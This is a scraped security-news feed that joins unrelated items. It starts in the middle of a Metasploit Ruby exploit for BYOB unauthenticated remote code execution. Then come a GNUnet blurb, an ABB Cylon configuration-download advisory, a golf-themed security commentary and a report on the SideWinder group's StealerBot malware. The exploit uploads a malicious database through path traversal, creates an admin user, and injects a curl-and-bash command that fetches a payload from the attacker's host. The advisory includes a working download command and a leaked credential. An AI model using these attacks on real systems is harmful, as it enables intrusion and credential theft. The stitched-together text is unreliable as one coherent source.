'/proc/self/cwd/../instance/database.db'    ]    filepaths.each do |filepath|      form_data = {        'data' => @encoded_db,        'filename' => filepath,        'type' => 'txt',        'owner' => Faker::Internet.username,        'module' => Faker::App.name.downcase,        'session' => Faker::Alphanumeric.alphanumeric(number: 8)      }      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => form_data,        'keep_cookies' => true      )      successful_paths << filepath if res&.code == 200    end    successful_paths  end  def on_new_session(session)    if session.type == 'meterpreter'      binary_content = Rex::Text.decode_base64(@encoded_db)      print_status('Restoring the database via Meterpreter to avoid leaving traces.')      successful_restore = false      @successful_paths.each do |remote_path|        remote_file = session.fs.file.new(remote_path, 'wb')        remote_file.syswrite(binary_content)        remote_file.close        successful_restore = true      end      if successful_restore        print_good('Database has been successfully restored to its clean state.')      else        print_error('Failed to restore the database on all attempted paths, but proceeding with the exploitation.')      end    else      print_error('This is not a Meterpreter session. Cannot proceed with database reset, but exploitation continues.')    end  end  def exploit    # Start necessary services and perform initial setup    start_service    primer    # Define or generate admin credentials    username = datastore['USERNAME'] || 'admin'    password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)    # Generate and upload the malicious SQLite database    print_status('Generating malicious SQLite database.')    @encoded_db = generate_malicious_db    @successful_paths = upload_database_multiple_paths    if @successful_paths.empty?      fail_with(Failure::UnexpectedReply, 'Failed to upload the database from all known paths')    else      print_good("Malicious database uploaded successfully to the following paths: #{@successful_paths.join(', ')}")    end    # Register the new admin user    print_status("Registering a new admin user: #{username}:#{password}")    register_user(username, password)    # Log in with the newly created admin user    print_status('Logging in with the new admin user.')    login_user(username, password)    # Prepare the malicious payload and inject it via command injection    print_status('Injecting payload via command injection.')    uri = get_uri.gsub(%r{^https?://}, '').chomp('/')    random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"    malicious_filename = "curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename}"    payload_data = {      'format' => 'exe',      'operating_system' => "nix$(#{malicious_filename})",      'architecture' => 'amd64'    }    # Send the command injection request    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'payload', 'generate'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => payload_data,      'keep_cookies' => true    }, 5)    # Keep the web server running to maintain the service    service.wait  endend

BYOB Unauthenticated Remote Code Execution

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing.

GNUnet P2P Framework 0.22.1

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated configuration download vulnerability. This can be exploited to download the SQLite DB that contains the configuration mappings information via the FTControlServlet by directly calling the mapConfigurationDownload.php script.

    ABB Cylon Aspect 3.08.01 (mapConfigurationDownload.php) Config DownloadVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated configurationdownload vulnerability. This can be exploited to download the SQLite DB thatcontains the configuration mappings information via the FTControlServlet bydirectly calling the mapConfigurationDownload.php script.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5843Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5843.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -A thricer http://192.168.73.31/mapConfigurationDownload.php -o juice.db  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100 3021k  100 3021k    0     0   112k      0  0:00:26  0:00:26 --:--:--  136k$ strings.exe juice.db | findstr /spina:d "tlsVersions"1878:dcom.aamatrix.topology.services.notification.EmailNotificationServer{"host":"smtp.gmail.com","smtpLocalhost":"google.com","starttls":1,"tlsVersions":"","from":"zsl_alarms@gmail.com","username":"zsl_alarms@gmail.com","password":"t00tw00t","port":587,"logDebugInfo":false,"authMode":0,"enabled":1,"serviceName":"EmailNotificationServer","debugLevel":0,"friendlyName":"Email Notification Service","description":""}

ABB Cylon Aspect 3.08.01 mapConfigurationDownload.php Configuration Download

As in golf, security requires collaboration across the entire organization, from individual contributors in each department to the executive level and the board.

Source: SunFlowerStudio via Alamy Stock Photo

COMMENTARY

I was talking with some friends about the recent 2024 Presidents Cup matchups, and how Mackenzie Hughes — a fellow Canadian — was going to play a pivotal role on the International Team. As we dug into game strategy, I had one of those lightbulb moments: There is a lot in common between golf and cybersecurity.  

Now, comparing a quiet game on a manicured golf course with a high-intensity, never-ending battle to secure critical data and digital assets might seem like a stretch. But stay with me — there is a real overlap between the challenges security leaders face and the sport that's been surging in popularity.  

Here are five takeaways that stand out to me. 

**Teamwork Is Critical **

Golf is often seen as an individual sport, but tournaments like the Presidents Cup remind us of the importance of teamwork. For those unfamiliar: At the Presidents Cup, 12 US golfers compete against a team of golfers from the rest of the world. Even as traditionally played, golf requires close collaboration. Golf Digest magazine recently declared that "professional golf is no longer an individual sport," as players now rely not only on their trusted caddies but also on statisticians, short game coaches, trainers, sports psychologists — you name it.  

It's the same with cybersecurity. There's a common misperception that it's IT's problem, but it's everyone's job to protect the company. In fact, recent research shows that nearly one in three employees think security isn't their problem — which likely explains why 54% of employees admit they don't always follow their company's security policies.  

Just like golf, security requires collaboration across the entire organization, from individual contributors in each department to the executive level and the board. Without a team effort, you're not going to get far.

**Fundamentals Matter **

In golf, it's tempting to think the latest gear will magically fix your game, but even with the most advanced clubs, you won't perform well if your grip, swing, and stance are off. In cybersecurity, it's the same. It's easy to get caught up in the buzz around new AI tools or fancy software, but if your fundamentals are weak, no shiny new tech is going to save you. 

At its core, security is about getting the basics right: things like multifactor authentication (MFA), keeping software updated, and maintaining strong password practices. Once those fundamentals are locked in, you can build from there. But skipping them? That's like trying to tee off without knowing how to hold the club properly.

**You Need a Full Bag of Clubs**

Every golfer knows that one club won't get you through a full round. You need a driver, irons, wedges, and a putter to handle different situations. The same goes for cybersecurity. There is no "silver bullet" solution that can handle all your security needs.  

A hybrid workforce, with employees using their personal devices across different locations, adds layers of complexity. You need a suite of tools that complement each other, working in harmony with human behavior. The best security tools don't focus only on protection — they also prioritize ease of use and help employees be productive while staying safe. 

**Shooting Par Is Hard**

To a non-golfer, shooting par might sound like an average accomplishment. But anyone who's tried it knows it's really hard, and keeping your organization safe is no different. Achieving a solid baseline of security is tough, especially when cybercriminals are constantly upping their game. 

More than one in three businesses (36%) have suffered cyberattacks costing more than $1 million in the past year, up from 27% the previous yearup from 27% the previous year. With generative AI (GenAI), attackers are creating more sophisticated, hard-to-detect threats, with deepfakes alone projected to cost $40 billion in 2027. 

As long as there's money to be made, criminals will continue to innovate fast. Staying the course and ahead of the competition will require security professionals and golfers alike to seize every edge, from technology to training.  

**The Best Make It Look Easy**

Watching a pro golfer hit a perfect shot can make the game look simple, but anyone who's tried knows better. In cybersecurity, the best solutions are often the easiest, most seamless, and least disruptive for employees to use. The easier it is for employees to follow security protocols without interrupting their flow, the more secure your organization will be.  

**About the Author**

CEO, 1Password

Jeff Shiner is the CEO of 1Password, a leading identity security company. Since joining in 2012, Jeff has grown the company from 20 people to a more than 1,000-employee global organization with a $6.8 billion valuation. Trusted by more than 150,000 businesses and millions of individuals, 1Password has expanded into a multiproduct identity security company that can secure every sign-in to every app from every device — even the unmanaged apps and devices that can’t easily be secured today in hybrid work environments. The company has been recognized on the Forbes Cloud 100 list, Fortune’s Cyber 60, Redpoint’s Infrared 100, and Quartz’s Best Companies for Remote Workers.

What Cybersecurity Leaders Can Learn From the Game of Golf

The long-active, India-sponsored cyber-threat group targeted multiple entities across Asia, Africa, the Middle East, and even Europe in a recent attack wave that demonstrated the use of a previously unknown post-exploit tool called StealerBot.

Source: Papilio via Alamy Stock Photo

The elusive, India-based advanced persistent threat (APT) group SideWinder has unleashed a new flurry of attacks against high-profile entities and strategic infrastructure targets that span numerous countries in Asia, the Middle East, Africa, and even Europe, signaling an expansion of its geographic reach. The attacks also show the group is using an advanced post-exploitation toolkit dubbed "StealerBot" to further its cyber-espionage activity, researchers have found.

The state-sponsored group — active since 2012, publicly outed in 2018, and mainly known for attacking rivals in Pakistan, Afghanistan, China, and Nepal — has demonstrated a widening of its geographic scope in the last six months. The latest attacks, observed by researchers at Kaspersky and outlined in a post on the SecureList blog, for the first time revealed some of SideWinder's post-compromise activities, which have remained largely unknown despite years of study by researchers.

Specifically, SideWinder has lately targeted entities in Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey, and the United Arab Emirates in the attacks. Affected sectors are varied, and include: government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities, and oil trading companies. Attackers also targeted diplomatic entities in Afghanistan, France, China, India, Indonesia, and Morocco.

As for StealerBot, the researchers described the malware — which they believe is the main post-exploitation tool used by SideWinder — as "an advanced modular implant designed specifically for espionage activities."

**SideWinder's Typical Cyberattack Chain**

Though geography and post-exploit tactics vary, SideWinder used its typical attack chain in the latest spate of attacks. The group started with a spear-phishing email with an attachment, which is usually a Microsoft OOXML document — ie, .docx or .xlsx — or a .zip archive, which in turn contains a malicious .lnk file. This file triggers a multistage infection chain with various JavaScript and .NET downloaders, which ultimately ends with the installation of the StealerBot espionage tool for further activity.

The documents used in the spear-phishing part of the campaign often contain information obtained from public websites, "which is used to lure the victim into opening the file and believing it to be legitimate," Kaspersky lead security researchers Giampaolo Dedola and Vasily Berdnikov wrote in the post. In this case, some of the email lures included public photos, images, and references to diplomatic and other activity that might be of interest to the intended target.

All the documents in the attacks use the remote template injection technique to download an .rtf file that is stored on a remote server controlled by the attackers. These files are specifically crafted to exploit CVE-2017-11882, a 7-year-old memory corruption vulnerability in Microsoft Office software, to download further shellcode and malware that uses various tricks to avoid sandboxes and complicate analysis, the researchers said. The ultimate purpose of the malware is to extricate data from infected systems and conduct cyberespionage.

**New StealerBot Modular Malware**

StealerBot, so-named by the attacker, is a modular implant developed with .NET to perform espionage activities. Rather than loading the malware's components on the filesystem of the infected machine, as is typical, the attack chain observed by the researchers loads them into memory by one of the numerous modules of the malware, which in this case acts as a backdoor loader that attackers dubbed "ModuleInstaller."

That module is a downloader that deploys the Trojan that SideWinder uses to maintain a foothold on compromised machines. It's a tool previously wielded by the group and observed by Kaspersky, but not unveiled publicly until now, the researchers noted.

The attackers designed ModuleInstaller to drop at least four files: a legitimate and signed application used to sideload a malicious library; a .config manifest embedded in the program as a resource and required by the next stage to properly load additional modules; a malicious library; and an encrypted payload. "We observed various combinations of the dropped files," the researchers noted.

Another module, called the "Orchestrator," is the main component of the malware that communicates with SideWinder command-and-control (C2) and executes and manages the other malware plugins. All told, StealerBot includes various modules for: installing additional malware, capturing screenshots, logging keystrokes, stealing passwords from browsers, stealing files, phishing Windows credentials, and escalating privileges by bypassing user account control (UAC), among other activities.

**Largely Underestimated Attackers**

SideWinder long has been perceived as a low-skilled threat group due to its use of public exploits and remote access Trojans (RATs), as well as malicious .lnk files and scripts as infection vectors, according to Kaspersky. However, they should not be underestimated by defenders, as "their true capabilities only become apparent when you carefully examine the details of their operations," the researchers wrote.

As the new wave of attacks shows "a significant expansion of the group’s activities," those who may be targeted should be on alert and aware of the threat posed by the group, they said.

To help defenders recognize the presence of SideWinder and its tool StealerBot on their networks, the researchers included a comprehensive list of indicators of compromise (IoCs) for various stages of the attack in their post.

The IoCs include references to malicious documents, and .rtf and .lnk files, as well as specific IoCs to various modules of StealerBot. A long list of malicious domains and IPs associated with the attacks also is included in the post.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Tag

#auth